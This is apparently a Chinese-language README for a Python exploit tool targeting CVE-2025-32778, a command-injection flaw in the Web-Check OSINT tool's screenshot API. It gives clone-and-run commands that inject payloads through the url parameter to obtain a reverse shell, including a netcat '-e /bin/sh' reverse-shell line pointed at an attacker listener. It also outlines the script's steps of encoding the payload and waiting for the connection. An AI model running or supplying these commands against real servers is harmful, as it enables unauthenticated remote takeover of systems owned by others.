CVE-2025-32778 是 Lissy93 开发的 Web-Check OSINT 工具中的一个严重命令注入漏洞。
它允许未经身份验证的攻击者通过截图 API 中的 url 参数执行任意系统命令。
此 Python 脚本自动化利用过程,并能够生成反向 Shell 或接受自定义 Shell 载荷。
url 命令注入漏洞。--lhost 和 --lport 生成反向 Shell。--shell 使用自定义 Shell。--shell 与 --lhost/--lport 组合使用。pip install requests
git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444
python3 cve-2025-32778.py -u http://target.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"
python3 cve-2025-32778.py -h
将目标 URL 标准化为 scheme://host[:port] 格式。
准备载荷:
--lhost 和 --lport 生成反向 Shell。--shell 传入原始 Shell 命令。对 Shell 载荷进行编码,以便安全地注入 URL。
向 /api/screenshot/ 发送带有载荷的 HTTP GET 请求。
等待反向 Shell 连接。
00xCanelo
GitHub 主页